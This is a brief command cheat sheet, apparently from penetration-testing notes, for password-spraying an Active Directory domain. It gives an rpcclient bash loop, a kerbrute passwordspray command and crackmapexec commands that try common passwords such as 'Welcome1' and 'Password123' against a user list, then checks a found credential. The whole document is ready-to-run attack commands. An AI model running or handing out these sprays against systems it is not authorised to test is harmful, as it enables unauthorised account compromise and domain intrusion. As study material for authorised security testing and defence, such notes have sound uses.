# Bash one-liner for the Attack which uses rpcclient
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" ip | grep Authority; done
# Using Kerbrute for the Attack
kerbrute passwordspray -d domain.local --dc ip valid_users.txt Welcome1
# Using CrackMapExec & Filtering Logon Failures
sudo crackmapexec smb ip -u valid_users.txt -p Password123 | grep +
# Validating the Credentials with CrackMapExec
sudo crackmapexec smb ip -u eren -p Password123